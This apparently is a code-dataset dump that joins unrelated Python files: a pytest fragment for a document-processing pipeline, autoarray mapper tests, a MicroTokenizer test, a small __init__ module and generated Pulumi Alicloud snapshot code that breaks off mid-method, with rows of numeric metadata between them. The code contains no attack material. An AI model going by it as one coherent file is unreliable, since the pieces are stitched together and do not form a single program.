dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_ALL_COMPLETE])
# -------------------------------------------------------------------------
cfg.glob.logger.info("=========> test_run_action_process_all_complete_auxiliary_deleted <=========")
check_db_content()
pytest.helpers.verify_content_of_inboxes(
inbox=(
[],
["README.md"],
),
inbox_accepted=(
[],
[
"docx_ok_1.docx",
"jpeg_pdf_text_ok_2.jpeg",
"pdf_scanned_ok_3.pdf",
"pdf_text_ok_4.pdf",
"translating_sql_into_relational_algebra_p01_02_6.pdf",
],
),
inbox_rejected=(
[],
["pdf_wrong_format_5.pdf"],
),
)
# -----------------------------------------------------------------------------
# Test RUN_ACTION_PROCESS_ALL_COMPLETE - empty.
# -----------------------------------------------------------------------------
def test_run_action_process_all_complete_auxiliary_empty(fxtr_setup_empty_db_and_inbox):
"""Test RUN_ACTION_PROCESS_ALL_COMPLETE - empty."""
cfg.glob.logger.debug(cfg.glob.LOGGER_START)
# -------------------------------------------------------------------------
pytest.helpers.copy_files_4_pytest_2_dir(
source_files=[
("empty_docx", "docx"),
("empty_jpg", "jpg"),
("empty_pdf_scanned", "pdf"),
("empty_pdf_text", "pdf"),
],
target_path=cfg.glob.setup.directory_inbox,
)
# -------------------------------------------------------------------------
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_ALL_COMPLETE])
# -------------------------------------------------------------------------
cfg.glob.logger.debug(cfg.glob.LOGGER_END)
# -----------------------------------------------------------------------------
# Test RUN_ACTION_PROCESS_ALL_COMPLETE - delete_auxiliary_files = false.
# -----------------------------------------------------------------------------
def test_run_action_process_all_complete_auxiliary_kept(fxtr_setup_empty_db_and_inbox):
"""Test RUN_ACTION_PROCESS_ALL_COMPLETE - delete_auxiliary_files = false."""
cfg.glob.logger.debug(cfg.glob.LOGGER_START)
# -------------------------------------------------------------------------
pytest.helpers.copy_files_4_pytest_2_dir(
source_files=[
("docx_ok", "docx"),
("jpeg_pdf_text_ok", "jpeg"),
("pdf_scanned_ok", "pdf"),
("pdf_text_ok", "pdf"),
("translating_sql_into_relational_algebra_p01_02", "pdf"),
],
target_path=cfg.glob.setup.directory_inbox,
)
# -------------------------------------------------------------------------
values_original = pytest.helpers.backup_config_params(
cfg.cls_setup.Setup._DCR_CFG_SECTION_ENV_TEST,
[
(cfg.cls_setup.Setup._DCR_CFG_DELETE_AUXILIARY_FILES, "false"),
],
)
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_ALL_COMPLETE])
pytest.helpers.restore_config_params(
cfg.cls_setup.Setup._DCR_CFG_SECTION_ENV_TEST,
values_original,
)
# -------------------------------------------------------------------------
cfg.glob.logger.info("=========> test_run_action_process_all_complete_auxiliary_kept <=========")
pytest.helpers.verify_content_of_inboxes(
inbox_accepted=(
[],
[
"docx_ok_1.docx",
"docx_ok_1.line.json",
"docx_ok_1.line.xml",
"docx_ok_1.pdf",
"jpeg_pdf_text_ok_2.jpeg",
"jpeg_pdf_text_ok_2.line.json",
"jpeg_pdf_text_ok_2.line.xml",
"jpeg_pdf_text_ok_2.pdf",
"pdf_scanned_ok_3.pdf",
"pdf_scanned_ok_3_1.jpeg",
"pdf_scanned_ok_3_1.line.json",
"pdf_scanned_ok_3_1.line.xml",
"pdf_scanned_ok_3_1.pdf",
"pdf_text_ok_4.line.json",
"pdf_text_ok_4.line.xml",
"pdf_text_ok_4.pdf",
"translating_sql_into_relational_algebra_p01_02_5.pdf",
"translating_sql_into_relational_algebra_p01_02_5_0.line.json",
"translating_sql_into_relational_algebra_p01_02_5_0.line.xml",
"translating_sql_into_relational_algebra_p01_02_5_0.pdf",
"translating_sql_into_relational_algebra_p01_02_5_1.jpeg",
"translating_sql_into_relational_algebra_p01_02_5_1.pdf",
"translating_sql_into_relational_algebra_p01_02_5_2.jpeg",
"translating_sql_into_relational_algebra_p01_02_5_2.pdf",
],
),
)
# -------------------------------------------------------------------------
cfg.glob.logger.debug(cfg.glob.LOGGER_END)
# -----------------------------------------------------------------------------
# Test RUN_ACTION_PROCESS_ALL_COMPLETE - status: error.
# -----------------------------------------------------------------------------
def test_run_action_process_all_complete_auxiliary_status_error(fxtr_setup_empty_db_and_inbox):
"""Test RUN_ACTION_PROCESS_ALL_COMPLETE - status: error."""
cfg.glob.logger.debug(cfg.glob.LOGGER_START)
# -------------------------------------------------------------------------
values_original = pytest.helpers.backup_config_params(
cfg.cls_setup.Setup._DCR_CFG_SECTION_ENV_TEST,
[
(cfg.cls_setup.Setup._DCR_CFG_DELETE_AUXILIARY_FILES, "true"),
(cfg.cls_setup.Setup._DCR_CFG_TETML_PAGE, "false"),
(cfg.cls_setup.Setup._DCR_CFG_TETML_WORD, "false"),
],
)
# -------------------------------------------------------------------------
pytest.helpers.copy_files_4_pytest_2_dir(
source_files=[
("docx_ok", "docx"),
("jpeg_pdf_text_ok", "jpeg"),
("pdf_scanned_ok", "pdf"),
("pdf_text_ok", "pdf"),
],
target_path=cfg.glob.setup.directory_inbox,
)
# -------------------------------------------------------------------------
db.cls_run.Run.ID_RUN_UMBRELLA = 0
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_INBOX])
# -------------------------------------------------------------------------
cfg.glob.db_core = db.cls_db_core.DBCore()
# -------------------------------------------------------------------------
cfg.glob.action_curr = db.cls_action.Action.from_id(6)
cfg.glob.action_curr.action_status = db.cls_document.Document.DOCUMENT_STATUS_ERROR
cfg.glob.action_curr.persist_2_db()
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_PDF2IMAGE])
# -------------------------------------------------------------------------
cfg.glob.action_curr = db.cls_action.Action.from_id(4)
cfg.glob.action_curr.action_status = db.cls_document.Document.DOCUMENT_STATUS_ERROR
cfg.glob.action_curr.persist_2_db()
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_TESSERACT])
# -------------------------------------------------------------------------
cfg.glob.action_curr = db.cls_action.Action.from_id(2)
cfg.glob.action_curr.action_status = db.cls_document.Document.DOCUMENT_STATUS_ERROR
cfg.glob.action_curr.persist_2_db()
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_PANDOC])
# -------------------------------------------------------------------------
cfg.glob.action_curr = db.cls_action.Action.from_id(8)
cfg.glob.action_curr.action_status = db.cls_document.Document.DOCUMENT_STATUS_ERROR
cfg.glob.action_curr.persist_2_db()
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_PDFLIB])
# -------------------------------------------------------------------------
cfg.glob.action_curr = db.cls_action.Action.from_id(13)
cfg.glob.action_curr.action_status = db.cls_document.Document.DOCUMENT_STATUS_ERROR
cfg.glob.action_curr.persist_2_db()
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_PARSER])
# -------------------------------------------------------------------------
cfg.glob.action_curr = db.cls_action.Action.from_id(17)
cfg.glob.action_curr.action_status = db.cls_document.Document.DOCUMENT_STATUS_ERROR
cfg.glob.action_curr.persist_2_db()
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_TOKENIZE])
pytest.helpers.restore_config_params(
cfg.cls_setup.Setup._DCR_CFG_SECTION_ENV_TEST,
values_original,
)
# -------------------------------------------------------------------------
cfg.glob.logger.info("=========> test_run_action_process_all_complete_auxiliary_status_error <=========")
pytest.helpers.verify_content_of_inboxes(
inbox_accepted=(
[],
[
"docx_ok_1.docx",
"jpeg_pdf_text_ok_2.jpeg",
"pdf_scanned_ok_3.pdf",
"pdf_text_ok_4.pdf",
],
),
)
# -------------------------------------------------------------------------
cfg.glob.logger.debug(cfg.glob.LOGGER_END)
| 30.006547 | 109 | 0.377059 | 3,068 | 36,668 | 4.127119 | 0.063233 | 0.075975 | 0.089559 | 0.104486 | 0.920708 | 0.905623 | 0.885326 | 0.849708 | 0.802322 | 0.719634 | 0 | 0.034226 | 0.421512 | 36,668 | 1,221 | 110 | 30.031122 | 0.5627 | 0.142058 | 0 | 0.761639 | 0 | 0 | 0.196361 | 0.084328 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009311 | false | 0 | 0.011173 | 0 | 0.020484 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
71bb9bece8c4c513a8887270fd8620901a325828 | 10,976 | py | Python | test_autoarray/unit/util/test_mapper_util.py | Sketos/PyAutoArray | 72dc7e8d1c38786915f82a7e7284239e5ce87624 | [
"MIT"
] | null | null | null | test_autoarray/unit/util/test_mapper_util.py | Sketos/PyAutoArray | 72dc7e8d1c38786915f82a7e7284239e5ce87624 | [
"MIT"
] | null | null | null | test_autoarray/unit/util/test_mapper_util.py | Sketos/PyAutoArray | 72dc7e8d1c38786915f82a7e7284239e5ce87624 | [
"MIT"
] | null | null | null | import autoarray as aa
import numpy as np
import pytest
@pytest.fixture(name="three_pixels")
def make_three_pixels():
return np.array([[0, 0], [0, 1], [1, 0]])
@pytest.fixture(name="five_pixels")
def make_five_pixels():
return np.array([[0, 0], [0, 1], [1, 0], [1, 1], [1, 2]])
class TestMappingMatrix:
def test__3_image_pixels__6_pixel_pixels__sub_grid_1x1(self, three_pixels):
pixelization_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
mask_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
mapping_matrix = aa.util.mapper.mapping_matrix_from_pixelization_1d_index_for_sub_mask_1d_index(
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
pixels=6,
total_mask_pixels=3,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
sub_fraction=1.0,
)
assert (
mapping_matrix
== np.array(
[
[1, 0, 0, 0, 0, 0], # Imaging pixel 0 maps to pix pixel 0.
[0, 1, 0, 0, 0, 0], # Imaging pixel 1 maps to pix pixel 1.
[0, 0, 1, 0, 0, 0],
]
)
).all() # Imaging pixel 2 maps to pix pixel 2
def test__5_image_pixels__8_pixel_pixels__sub_grid_1x1(self, five_pixels):
pixelization_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2, 7, 6])
mask_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2, 3, 4])
mapping_matrix = aa.util.mapper.mapping_matrix_from_pixelization_1d_index_for_sub_mask_1d_index(
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
pixels=8,
total_mask_pixels=5,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
sub_fraction=1.0,
)
assert (
mapping_matrix
== np.array(
[
[
1,
0,
0,
0,
0,
0,
0,
0,
                    ],  # Imaging pixel 0 maps to pix pixel 0.
[
0,
1,
0,
0,
0,
0,
0,
0,
                    ],  # Imaging pixel 1 maps to pix pixel 1.
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0],
]
)
        ).all()  # Imaging pixel 2 maps to pix pixel 2.
def test__5_image_pixels__8_pixel_pixels__sub_grid_2x2__no_overlapping_pixels(
self, five_pixels
):
pixelization_1d_index_for_sub_mask_1d_index = np.array(
[0, 1, 2, 3, 1, 2, 3, 4, 2, 3, 4, 5, 7, 0, 1, 3, 6, 7, 4, 2]
)
mask_1d_index_for_sub_mask_1d_index = np.array(
[0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4]
)
mapping_matrix = aa.util.mapper.mapping_matrix_from_pixelization_1d_index_for_sub_mask_1d_index(
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
pixels=8,
total_mask_pixels=5,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
sub_fraction=0.25,
)
assert (
mapping_matrix
== np.array(
[
[0.25, 0.25, 0.25, 0.25, 0, 0, 0, 0],
[0, 0.25, 0.25, 0.25, 0.25, 0, 0, 0],
[0, 0, 0.25, 0.25, 0.25, 0.25, 0, 0],
[0.25, 0.25, 0, 0.25, 0, 0, 0, 0.25],
[0, 0, 0.25, 0, 0.25, 0, 0.25, 0.25],
]
)
).all()
def test__5_image_pixels__8_pixel_pixels__sub_grid_2x2__include_overlapping_pixels(
self, five_pixels
):
pixelization_1d_index_for_sub_mask_1d_index = np.array(
[0, 0, 0, 1, 1, 1, 0, 0, 2, 3, 4, 5, 7, 0, 1, 3, 6, 7, 4, 2]
)
mask_1d_index_for_sub_mask_1d_index = np.array(
[0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4]
)
mapping_matrix = aa.util.mapper.mapping_matrix_from_pixelization_1d_index_for_sub_mask_1d_index(
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
pixels=8,
total_mask_pixels=5,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
sub_fraction=0.25,
)
assert (
mapping_matrix
== np.array(
[
[0.75, 0.25, 0, 0, 0, 0, 0, 0],
[0.5, 0.5, 0, 0, 0, 0, 0, 0],
[0, 0, 0.25, 0.25, 0.25, 0.25, 0, 0],
[0.25, 0.25, 0, 0.25, 0, 0, 0, 0.25],
[0, 0, 0.25, 0, 0.25, 0, 0.25, 0.25],
]
)
).all()
def test__3_image_pixels__6_pixel_pixels__sub_grid_4x4(self, three_pixels):
pixelization_1d_index_for_sub_mask_1d_index = np.array(
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
1,
1,
1,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
0,
1,
2,
3,
4,
5,
0,
1,
2,
3,
4,
5,
0,
1,
2,
3,
]
)
mask_1d_index_for_sub_mask_1d_index = np.array(
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
]
)
mapping_matrix = aa.util.mapper.mapping_matrix_from_pixelization_1d_index_for_sub_mask_1d_index(
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
pixels=6,
total_mask_pixels=3,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
sub_fraction=1.0 / 16.0,
)
assert (
mapping_matrix
== np.array(
[
[0.75, 0.25, 0, 0, 0, 0],
[0, 0, 1.0, 0, 0, 0],
[0.1875, 0.1875, 0.1875, 0.1875, 0.125, 0.125],
]
)
).all()
class TestPixelSignals:
def test__x3_image_pixels_signals_1s__pixel_scale_1__pixel_signals_all_1s(self):
pixelization_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
mask_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
galaxy_image = np.array([1.0, 1.0, 1.0])
pixel_signals = aa.util.mapper.adaptive_pixel_signals_from_images(
pixels=3,
signal_scale=1.0,
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
hyper_image=galaxy_image,
)
assert (pixel_signals == np.array([1.0, 1.0, 1.0])).all()
def test__x4_image_pixels_signals_1s__pixel_signals_still_all_1s(self):
pixelization_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2, 0])
mask_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2, 0])
galaxy_image = np.array([1.0, 1.0, 1.0, 1.0])
pixel_signals = aa.util.mapper.adaptive_pixel_signals_from_images(
pixels=3,
signal_scale=1.0,
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
hyper_image=galaxy_image,
)
assert (pixel_signals == np.array([1.0, 1.0, 1.0])).all()
def test__galaxy_flux_in_a_pixel_pixel_is_double_the_others__pixel_signal_is_1_others_a_half(
self
):
pixelization_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
mask_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
galaxy_image = np.array([2.0, 1.0, 1.0])
pixel_signals = aa.util.mapper.adaptive_pixel_signals_from_images(
pixels=3,
signal_scale=1.0,
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
hyper_image=galaxy_image,
)
assert (pixel_signals == np.array([1.0, 0.5, 0.5])).all()
def test__same_as_above_but_pixel_scale_2__scales_pixel_signals(self):
pixelization_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
mask_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
galaxy_image = np.array([2.0, 1.0, 1.0])
pixel_signals = aa.util.mapper.adaptive_pixel_signals_from_images(
pixels=3,
signal_scale=2.0,
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
hyper_image=galaxy_image,
)
assert (pixel_signals == np.array([1.0, 0.25, 0.25])).all()
| 32.093567 | 104 | 0.482325 | 1,470 | 10,976 | 3.168707 | 0.059864 | 0.057535 | 0.061185 | 0.059253 | 0.903177 | 0.891155 | 0.882568 | 0.87763 | 0.877201 | 0.876342 | 0 | 0.117479 | 0.42766 | 10,976 | 341 | 105 | 32.187683 | 0.624005 | 0.024872 | 0 | 0.725753 | 0 | 0 | 0.00215 | 0 | 0 | 0 | 0 | 0 | 0.0301 | 1 | 0.036789 | false | 0 | 0.010033 | 0.006689 | 0.060201 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
71cb91eca79a67ac89ff6ccb09d0b37e6c394f44 | 181 | py | Python | readme/tests/test_export_graphml.py | howl-anderson/MicroTokenizer | f0ad19ee42fc947f432dfcbe687a474ccc78c7c8 | [
"MIT"
] | 136 | 2018-06-12T14:30:05.000Z | 2022-03-25T09:50:33.000Z | readme/tests/test_export_graphml.py | howl-anderson/MicroTokenizer | f0ad19ee42fc947f432dfcbe687a474ccc78c7c8 | [
"MIT"
] | 5 | 2018-06-19T05:21:09.000Z | 2021-07-16T13:41:00.000Z | readme/tests/test_export_graphml.py | howl-anderson/MicroTokenizer | f0ad19ee42fc947f432dfcbe687a474ccc78c7c8 | [
"MIT"
] | 16 | 2018-09-19T13:33:42.000Z | 2021-06-02T03:30:31.000Z | def test_main():
from MicroTokenizer import dag_tokenizer
dag_tokenizer.graph_builder.build_graph("知识就是力量")
dag_tokenizer.graph_builder.write_graphml("output.graphml")
| 30.166667 | 63 | 0.79558 | 23 | 181 | 5.913043 | 0.652174 | 0.264706 | 0.25 | 0.352941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116022 | 181 | 5 | 64 | 36.2 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0.110497 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e0e24cf810935cb59d063e8fa1d0f26277ddbde3 | 146 | py | Python | app/events/__init__.py | dominik-air/lol-afk-buddy | b9e76336803922bd5f60dac33ec34f471eea3422 | [
"MIT"
] | 1 | 2021-10-11T23:02:19.000Z | 2021-10-11T23:02:19.000Z | app/events/__init__.py | dominik-air/lol-afk-buddy | b9e76336803922bd5f60dac33ec34f471eea3422 | [
"MIT"
] | 2 | 2022-02-04T20:32:18.000Z | 2022-02-04T20:38:49.000Z | app/events/__init__.py | dominik-air/lol-afk-buddy | b9e76336803922bd5f60dac33ec34f471eea3422 | [
"MIT"
] | 1 | 2022-02-05T15:12:15.000Z | 2022-02-05T15:12:15.000Z | from .event import post_event
from .email_listener import setup_email_event_handlers
from .telegram_listener import setup_telegram_event_handlers
| 36.5 | 60 | 0.89726 | 21 | 146 | 5.809524 | 0.428571 | 0.229508 | 0.311475 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082192 | 146 | 3 | 61 | 48.666667 | 0.910448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1cc231f0c6a1e7f99c5ec7b3be7bb592f47899a8 | 26,572 | py | Python | sdk/python/pulumi_alicloud/ecs/snapshot.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 42 | 2019-03-18T06:34:37.000Z | 2022-03-24T07:08:57.000Z | sdk/python/pulumi_alicloud/ecs/snapshot.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 152 | 2019-04-15T21:03:44.000Z | 2022-03-29T18:00:57.000Z | sdk/python/pulumi_alicloud/ecs/snapshot.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2020-08-26T17:30:07.000Z | 2021-07-05T01:37:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['SnapshotArgs', 'Snapshot']
@pulumi.input_type
class SnapshotArgs:
def __init__(__self__, *,
disk_id: pulumi.Input[str],
category: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
force: Optional[pulumi.Input[bool]] = None,
instant_access: Optional[pulumi.Input[bool]] = None,
instant_access_retention_days: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
retention_days: Optional[pulumi.Input[int]] = None,
snapshot_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None):
"""
The set of arguments for constructing a Snapshot resource.
:param pulumi.Input[str] disk_id: The source disk ID.
        :param pulumi.Input[str] description: Description of the snapshot. This description can have a string of 2 to 256 characters. It cannot begin with http:// or https://. Default value is null.
:param pulumi.Input[str] name: The name of the snapshot to be created. The name must be 2 to 128 characters in length. It must start with a letter and cannot start with http:// or https://. It can contain letters, digits, colons (:), underscores (_), and hyphens (-).
It cannot start with auto, because snapshot names starting with auto are recognized as automatic snapshots.
:param pulumi.Input[str] resource_group_id: The ID of the resource group.
:param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "disk_id", disk_id)
if category is not None:
pulumi.set(__self__, "category", category)
if description is not None:
pulumi.set(__self__, "description", description)
if force is not None:
pulumi.set(__self__, "force", force)
if instant_access is not None:
pulumi.set(__self__, "instant_access", instant_access)
if instant_access_retention_days is not None:
pulumi.set(__self__, "instant_access_retention_days", instant_access_retention_days)
if name is not None:
warnings.warn("""Field 'name' has been deprecated from provider version 1.120.0. New field 'snapshot_name' instead.""", DeprecationWarning)
pulumi.log.warn("""name is deprecated: Field 'name' has been deprecated from provider version 1.120.0. New field 'snapshot_name' instead.""")
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_id is not None:
pulumi.set(__self__, "resource_group_id", resource_group_id)
if retention_days is not None:
pulumi.set(__self__, "retention_days", retention_days)
if snapshot_name is not None:
pulumi.set(__self__, "snapshot_name", snapshot_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="diskId")
def disk_id(self) -> pulumi.Input[str]:
"""
The source disk ID.
"""
return pulumi.get(self, "disk_id")
@disk_id.setter
def disk_id(self, value: pulumi.Input[str]):
pulumi.set(self, "disk_id", value)
@property
@pulumi.getter
def category(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "category")
@category.setter
def category(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "category", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
        Description of the snapshot. This description can have a string of 2 to 256 characters. It cannot begin with http:// or https://. Default value is null.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def force(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "force")
@force.setter
def force(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force", value)
@property
@pulumi.getter(name="instantAccess")
def instant_access(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "instant_access")
@instant_access.setter
def instant_access(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "instant_access", value)
@property
@pulumi.getter(name="instantAccessRetentionDays")
def instant_access_retention_days(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "instant_access_retention_days")
@instant_access_retention_days.setter
def instant_access_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "instant_access_retention_days", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the snapshot to be created. The name must be 2 to 128 characters in length. It must start with a letter and cannot start with http:// or https://. It can contain letters, digits, colons (:), underscores (_), and hyphens (-).
It cannot start with auto, because snapshot names starting with auto are recognized as automatic snapshots.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the resource group.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_id", value)
@property
@pulumi.getter(name="retentionDays")
def retention_days(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "retention_days")
@retention_days.setter
def retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retention_days", value)
@property
@pulumi.getter(name="snapshotName")
def snapshot_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "snapshot_name")
@snapshot_name.setter
def snapshot_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "snapshot_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _SnapshotState:
def __init__(__self__, *,
category: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
disk_id: Optional[pulumi.Input[str]] = None,
force: Optional[pulumi.Input[bool]] = None,
instant_access: Optional[pulumi.Input[bool]] = None,
instant_access_retention_days: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
retention_days: Optional[pulumi.Input[int]] = None,
snapshot_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None):
"""
Input properties used for looking up and filtering Snapshot resources.
        :param pulumi.Input[str] description: Description of the snapshot. This description can have a string of 2 to 256 characters. It cannot begin with http:// or https://. Default value is null.
:param pulumi.Input[str] disk_id: The source disk ID.
:param pulumi.Input[str] name: The name of the snapshot to be created. The name must be 2 to 128 characters in length. It must start with a letter and cannot start with http:// or https://. It can contain letters, digits, colons (:), underscores (_), and hyphens (-).
It cannot start with auto, because snapshot names starting with auto are recognized as automatic snapshots.
:param pulumi.Input[str] resource_group_id: The ID of the resource group.
:param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
"""
if category is not None:
pulumi.set(__self__, "category", category)
if description is not None:
pulumi.set(__self__, "description", description)
if disk_id is not None:
pulumi.set(__self__, "disk_id", disk_id)
if force is not None:
pulumi.set(__self__, "force", force)
if instant_access is not None:
pulumi.set(__self__, "instant_access", instant_access)
if instant_access_retention_days is not None:
pulumi.set(__self__, "instant_access_retention_days", instant_access_retention_days)
if name is not None:
warnings.warn("""Field 'name' has been deprecated from provider version 1.120.0. New field 'snapshot_name' instead.""", DeprecationWarning)
